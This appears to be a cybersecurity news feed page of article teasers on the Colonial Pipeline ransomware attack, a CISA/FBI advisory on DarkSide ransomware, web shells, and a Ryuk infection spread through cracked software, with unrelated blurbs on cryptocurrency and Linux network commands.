Here is something you never want to hear about your company after a ransomware attack: “I mean, an eighth-grader could have hacked into that system.” Which company was this about about? Colonial Pipeline. The person speaking authored a $1.8 million information governance report for the company which uncovered “a patchwork of poorly connected and secured systems.” Is this what led to the successful ransomware attack against the company? The attack left millions of drivers in the eastern U.S., along with airlines and truckers, scrambling to find fuel. And let’s consider another key question. How much action did Colonial Pipeline take to shore up its vulnerabilities following the report? We may never know. Unlike cybersecurity standards that electric providers must adhere… Read more
Government and business both need to step up to combat ransomware attacks against critical systems before they spiral further out of control. The ransomware attack against Colonial Pipeline represents a relatively new and destructive type of threat against critical infrastructure. Beyond the financial and operational hit to the company itself, such an attack threatens to impact millions of people dependent on the safe and quick delivery of gas and oil.
Original release date: May 11, 2021
CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on a ransomware-as-a-service (RaaS) variant—referred to as DarkSide—recently used in a ransomware attack against a critical infrastructure (CI) company.
Cybercriminal groups use DarkSide to gain access to a victim’s network to encrypt and exfiltrate data. These groups then threaten to expose data if the victim does not pay the ransom. Groups leveraging DarkSide have recently been targeting organizations across various CI sectors including manufacturing, legal, insurance, healthcare, and energy.
Prevention is the most effective defense against ransomware. It is critical to follow best practices to protect against ransomware attacks, which can be devastating to an individual or organization and recovery may be a difficult process. In addition to the Joint CSA, CISA and FBI urge CI asset owners and operators to review the following resources for best practices on strengthening cybersecurity posture:
- CISA and Multi-State Information Sharing and Analysis Center: Joint Ransomware Guide
- CISA webpage: Ransomware Guidance and Resources
- CISA Insights: Ransomware Outbreak
- CISA Pipeline Cybersecurity Initiative
- CISA Pipeline Cybersecurity Resources Library
Dogecoin has a super-fan in Elon Musk, Ripple pre-mined billions of XRP coins and Tether is a bridge between physical money and cryptocurrencies.
These are the basic Linux network commands every admin should be able to use for troubleshooting network connection problems.
The use of web shells is increasing, which could put your business at risk. Tom Merritt lists five things to know about web shells. Recently, the U.S. FBI was given court authorization to delete web shells from Microsoft Exchange servers. Web shells are a rising menace. They let attackers hide an entry point in your network that’s hard to get rid of. You don’t generally let the FBI go scanning for web shells if it’s an easy fix. Why all the angst? Here are five things to know about web shells.
Bleeping Computer recently reported that an end user in a research institute –a student in this case– attempted to pirate expensive data visualization software, which resulted in a Ryuk ransomware attack.
We’ve seen ransomware distributed in the past through cryptocurrency miners but this type of ‘crack site’ attack takes ransomware attacks to a whole other level.
The student had searched for data visualization software that they wanted to install at home. Instead of buying a legit license, the student proceeded to search for a cracked version and downloaded it. The illegal download resulted in an infection with an information-stealing trojan that stole the credentials needed by Ryuk cybercriminals to log into the institute and wreak havoc.
This attack lost the institute a week’s worth of research data and a week-long network outage as servers were rebuilt from scratch and data restored from backups. More…